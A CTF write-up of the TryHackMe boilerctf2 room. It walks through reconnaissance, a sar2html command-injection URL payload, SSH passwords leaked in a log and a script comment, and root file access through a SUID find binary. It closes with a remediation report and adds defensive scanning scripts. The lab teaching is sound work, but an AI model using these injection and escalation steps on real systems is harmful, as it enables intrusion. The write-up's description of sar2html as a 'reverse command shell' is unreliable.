Address: https://tryhackme.com/r/room/boilerctf2
It's the second CTF I've done on tryhackme.com. Since I spend much more time reading the learning material than practising, I take every opportunity to practise in a CTF seriously. This write-up records my thinking and my confusion during the process.
First Stage: Active reconnaissance
Because it's a CTF environment, I skipped the passive reconnaissance of publicly available information. What services does the server provide? Nmap is a good tool to figure that out.
Command: nmap -A -v 10.10.50.255
Problem: the results do not contain port 55007, on which an SSH service listens (by default Nmap only scans the 1000 most common TCP ports). So a port range parameter is appended to scan every port.
nmap -A -v -p1-65535 10.10.50.255
This time, at a much slower speed, we got four ports with services listening: 80, 10000, 21, 55007. Maybe there are better/faster ways to do the inspection.
The service information on each port is listed below:
There are two web servers, deployed on 80 and 10000; one is HTTP and the other HTTPS.
There is also an FTP server listening on 21.
And an SSH service is running on port 55007.
Now, can we do further reconnaissance based on the port scan results?
FTP server 21
Nmap has already reported that the FTP server allows anonymous login, so we can try to log in and look around.
root@ip-10-10-27-76:~# ftp 10.10.50.255
Connected to 10.10.50.255.
220 (vsFTPd 3.0.3)
Name (10.10.50.255:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
OK, logged in successfully as anonymous. Now I can check whether any files are available.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 ..
-rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt
226 Directory send OK.
ftp> get .info.txt
local: .info.txt remote: .info.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.00 secs (127.4526 kB/s)
A hidden file named .info.txt was found; naturally it gets downloaded and its content viewed.
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
When the content is displayed, I suspect it is a simple cipher like a letter rotation. But hold on, let's turn our attention to the other services first (because I would need to write code to decode it now).
HTTP server 80
Let's try to get some information from this server, usually following these steps:
robots.txt
wget http://10.10.50.255/robots.txt
After the download succeeds, the file is opened:
What the hell is the last line, holding those strange digits? Surely it's some kind of encryption. Let's deal with it later.
sitemap.xml
Unfortunately, sitemap.xml does not exist on this web server; wget failed to download it.
directory searching
Gobuster is a good tool for checking directories against a wordlist of likely directory names.
gobuster dir --url=10.10.50.255 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
The following sub-directories were found:
Let's go further into /manual/ and /joomla/ (/server-status returns 403, so it can be skipped; /manual/ usually just contains usage documentation, which is rarely useful for going further).
/manual/
/joomla/
Note: _test is not included in the wordlist; I added it manually.
Furthermore, we could even try to fetch the default files in each directory, but that would be a lot more work, so let's stop here.
HTTP server 10000
When I tried to enumerate the server, a failure was reported like the one below:
I think it failed because of an invalid certificate, and I'm not going to investigate it deeply now.
SSH 55007
Without any available account and password, I don't think any information can be gathered here for now.
OK, let's end the reconnaissance and move on to the next stage.
Second Stage: Find the vulnerable point
Comparing the content of robots.txt with the sub-directories found by gobuster, they are completely different, so we can guess that robots.txt is misconfigured.
But there are some strange digits listed in robots.txt; let's try to find out what they really are.
At first glance, I guess they are ASCII bytes written as decimal digits. So let's turn them back into ASCII now.
#include <stdio.h>

int main(void) {
    /* The decimal values from the last line of robots.txt, one per character. */
    int asc_texts[] = {
        79, 84, 108, 105, 77, 68, 89, 50, 77, 71, 78, 107, 79, 84, 86, 104,
        90, 71, 86, 104, 77, 122, 73, 51, 89, 122, 85, 48, 77,
        84, 103, 121, 89, 109, 70, 104, 78, 84, 69, 49, 79, 68, 81, 75
    };
    /* Print each value as the ASCII character it encodes. */
    for (size_t i = 0; i < sizeof(asc_texts) / sizeof(asc_texts[0]); i++) {
        printf("%c", asc_texts[i]);
    }
    printf("\n");
    return 0;
}
result: OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK
Well, it must be base64 encoded, because ... it looks base64 encoded.
With Burp Suite's Decoder, we can easily decode it to:
Well, the text looks very much like a hash. Searching for it on bing.com gives the cracked plaintext: kidding.
Unfortunately, http://10.10.50.255/kidding does not exist either, just like the other directories listed in robots.txt.
Well, moving to /joomla/, directories named tests, _test, _files and tmp are usually of interest. Let's check them.
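Both puzzles met so far, the rotated text in .info.txt and the decimal digits in robots.txt, can be solved offline in a few lines. The script below is an added example and not part of the original write-up: it performs the ROT13 decode postponed earlier, the digits-to-ASCII step done in C above, the base64 decode done in Burp, and the hash comparison that a lookup site performs. The inputs are copied from the page; the candidate word "kidding" is only tested against the digest, not assumed to match.

```python
import base64
import codecs
import hashlib

# Constructed from the page: the .info.txt content and the digits from robots.txt.
INFO_TXT = "Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!"
ROBOTS_DIGITS = [
    79, 84, 108, 105, 77, 68, 89, 50, 77, 71, 78, 107, 79, 84, 86, 104,
    90, 71, 86, 104, 77, 122, 73, 51, 89, 122, 85, 48, 77,
    84, 103, 121, 89, 109, 70, 104, 78, 84, 69, 49, 79, 68, 81, 75,
]


def rot13(text):
    """Rotate every letter by 13 places; ROT13 is its own inverse."""
    return codecs.decode(text, "rot_13")


def digits_to_text(values):
    """Interpret each decimal value as one ASCII byte."""
    if any(not 0 <= v < 128 for v in values):
        raise ValueError("value outside the ASCII range")
    return bytes(values).decode("ascii")


def decode_robots_line(values):
    """Decimal ASCII -> base64 text -> decoded bytes, with the trailing newline stripped."""
    b64 = digits_to_text(values)
    # validate=True rejects characters outside the base64 alphabet instead of ignoring them.
    return base64.b64decode(b64, validate=True).decode("ascii").strip()


def looks_like_md5(s):
    """32 lowercase hex characters is the shape of an MD5 digest."""
    return len(s) == 32 and all(c in "0123456789abcdef" for c in s)


def md5_matches(candidate, digest):
    """What a hash lookup site does: hash a guess and compare it to the digest."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest


if __name__ == "__main__":
    print(".info.txt decoded:", rot13(INFO_TXT))
    payload = decode_robots_line(ROBOTS_DIGITS)
    print("robots.txt payload:", payload, "| MD5-shaped:", looks_like_md5(payload))
    print("md5('kidding') matches:", md5_matches("kidding", payload))
```

The strict base64 decode matters in practice: without validate=True, stray whitespace or punctuation in a scraped string is silently discarded and can turn a wrong guess into a plausible-looking result.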
Well, tests contains some source code and SQL files stored under unit; these are really invaluable for hackers.
When visiting _files, I got the following string. It looks like base64; after decoding it as base64 twice, this result is shown:
Whopsie daisy? What the hell is it? I don't know; maybe it's a key, a user name, or something else.
Nothing was found in the tmp directory.
Now we explore the _test directory. What's sar2html?
Well, sar2html is a reverse command shell!!! It's obviously an open gate for hackers. Let's step in to check where it leaks.
Visit: http://10.10.50.255/joomla/_test/index.php?plot=;ls -la
The listing contains a file named log.txt. Let's download and view it.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
From the content, it must be an SSH login log. And fortunately, we get a username/password from it:
basterd: #pass: superduperp@$$
Well, we have a valid username/password pair for the SSH service then. So let's go to the SSH service and try to log in. [Since the virtual machine had expired, I requested a new one, so the IP has changed now.]
root@ip-10-10-195-217:~# ssh basterd@10.10.207.217 -p55007
basterd@10.10.207.217's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
8 packages can be updated.
8 updates are security updates.
Last login: Thu Aug 22 12:29:45 2019 from 192.168.1.199
$ ls -la
total 16
drwxr-x--- 3 basterd basterd 4096 Aug 22 2019 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
-rwxr-xr-x 1 stoner basterd 699 Aug 21 2019 backup.sh
-rw------- 1 basterd basterd 0 Aug 22 2019 .bash_history
drwx------ 2 basterd basterd 4096 Aug 22 2019 .cache
$
Logged in successfully, and a file named backup.sh was found here; let's view the file.
$ cat ./backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
OMG, there's a username in the file with its password in a comment:
stoner: superduperp@$$no1knows
Now we have another valid username.
Third Stage: Elevate privileges
Let's check whether basterd can run anything with root permission.
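Both credentials so far came from the same mistake: a password written into a file that was never meant to hold one (a log line and a comment in backup.sh). As an added example, not from the original write-up, the scanner below applies two detection rules to those two files, reproduced here as constructed sample input: a credential keyword followed by ':' or '=' and a value, and a comment line that consists of nothing but a password-shaped token. The rules and thresholds are my own choices.

```python
import re
from dataclasses import dataclass

# Constructed sample input, copied from the two files found on the box.
LOG_LINES = [
    "Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.",
    "Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$",
    "Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)",
]
SCRIPT_LINES = [
    "REMOTE=1.2.3.4",
    "USER=stoner",
    "#superduperp@$$no1knows",
    "ssh $USER@$REMOTE mkdir $TARGET/$DATE",
]

# Rule 1: a credential keyword followed by ':' or '=' and a value, anywhere in the line.
KEYWORD_RE = re.compile(r"(?i)\b(?:pass(?:word|wd)?|pwd|secret|token|api_?key)\b\s*[:=]\s*(\S+)")
# Rule 2: a comment line whose only content is a single token (judged by looks_like_secret).
COMMENT_RE = re.compile(r"^\s*#\s*(\S+)\s*$")


@dataclass
class Finding:
    source: str
    line_no: int
    rule: str
    value: str


def looks_like_secret(token):
    """A bare token at least 8 long that mixes lowercase, upper/digits and symbols."""
    classes = sum((
        any(c.islower() for c in token),
        any(c.isupper() or c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    ))
    return len(token) >= 8 and classes == 3


def scan(lines, source):
    """Apply both rules to each line; one finding per offending line."""
    findings = []
    for n, line in enumerate(lines, start=1):
        m = KEYWORD_RE.search(line)
        if m:
            findings.append(Finding(source, n, "keyword", m.group(1)))
            continue
        m = COMMENT_RE.match(line)
        if m and looks_like_secret(m.group(1)):
            findings.append(Finding(source, n, "comment-token", m.group(1)))
    return findings


if __name__ == "__main__":
    for f in scan(LOG_LINES, "log.txt") + scan(SCRIPT_LINES, "backup.sh"):
        print(f"{f.source}:{f.line_no} [{f.rule}] {f.value}")
```

Rule 2 deliberately ignores shebang lines and ordinary comments: "!/bin/bash" has letters and symbols but no digit or capital, and a comment with spaces in it never matches. The same scan run over a real host's logs and cron scripts is the check that would have caught items b and c of the report before an attacker did.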
$ sudo -l
[sudo] password for basterd:
Sorry, user basterd may not run sudo on Vulnerable.
But basterd has no permission to run anything as root. There's nothing more to do with this account, so let's try the new user named stoner.
Well, stoner can run certain commands with root permission. This requires some knowledge of sudo configuration. Let's find out which commands stoner can run with elevated permissions. The command below lists files owned by root that carry the SUID bit (-perm -4000); such a binary runs with root's privileges no matter who executes it.
find / -user root -perm -4000
stoner@Vulnerable:~$ find / -user root -perm -4000
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
find: ‘/proc/1517/task/1517/fd/6’: No such file or directory
find: ‘/proc/1517/task/1517/fdinfo/6’: No such file or directory
find: ‘/proc/1517/fd/5’: No such file or directory
find: ‘/proc/1517/fdinfo/5’: No such file or directory
Looking through the results for what stoner could run with root privilege, the find command is useful because its -exec action runs a command on every file it finds.
In this CTF, root.txt has to be found. Let's try:
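From the defender's side, the question is not what find can do but why it carries the SUID bit at all. The audit below is an added example, not part of the original write-up: it parses the output of the find command above (including the /proc error lines that find prints while processes come and go) and reports every SUID-root binary that is not in a baseline. The baseline is my assumption of what the packages installed on this box normally ship; in practice it is taken from a known-good image of the same build, never from the host being audited.

```python
# Constructed from the page: the output of `find / -user root -perm -4000` on the
# box, including the /proc errors that find prints while processes come and go.
FIND_OUTPUT = """\
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
find: ‘/proc/1517/task/1517/fd/6’: No such file or directory
find: ‘/proc/1517/fd/5’: No such file or directory
"""

# Assumed baseline (my assumption, not from the page): the SUID-root binaries that the
# packages installed on a box like this one normally ship. Take it from a known-good
# image of the same build, never from the host being audited.
BASELINE = frozenset({
    "/bin/su", "/bin/fusermount", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/ping",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/apache2/suexec-custom", "/usr/lib/apache2/suexec-pristine",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/newgidmap", "/usr/bin/newuidmap", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/bin/pkexec",
    "/usr/bin/gpasswd",
})


def parse_find_output(text):
    """Return the absolute paths in find's output, dropping its error lines."""
    paths = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("find:"):
            continue  # blank line, or 'find: ...: No such file or directory'
        if not line.startswith("/"):
            raise ValueError(f"unexpected line in find output: {line!r}")
        paths.append(line)
    return paths


def unexpected_suid(paths, baseline=BASELINE):
    """SUID-root binaries present on the host but absent from the baseline."""
    return sorted(set(paths) - baseline)


def baseline_not_found(paths, baseline=BASELINE):
    """Baseline entries missing on the host; worth noting, but not a privilege risk."""
    return sorted(baseline - set(paths))


if __name__ == "__main__":
    found = parse_find_output(FIND_OUTPUT)
    print(f"{len(found)} SUID-root binaries found")
    for path in unexpected_suid(found):
        print("NOT IN BASELINE:", path)
    for path in baseline_not_found(found):
        print("baseline entry absent:", path)
```

Running this as a scheduled check and alerting on a non-empty NOT IN BASELINE list is the control that maps to item d of the report: a general-purpose binary such as find acquiring the SUID bit is exactly the kind of drift a baseline diff catches.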
stoner@Vulnerable:~$ find / -name root.txt
/root/root.txt
stoner@Vulnerable:~$ find / -name root.txt -exec cat '{}' \;
It wasn't that hard, was it?
Now we have the content of root.txt.
Fourth Stage: Report
a. The first vulnerable point is sar2html in the _test directory; it allows remote command execution.
b. Usernames/passwords should not be saved directly in log.txt.
c. Usernames/passwords should not be saved in source code (backup.sh).
d. stoner was configured to be able to run find with root permission.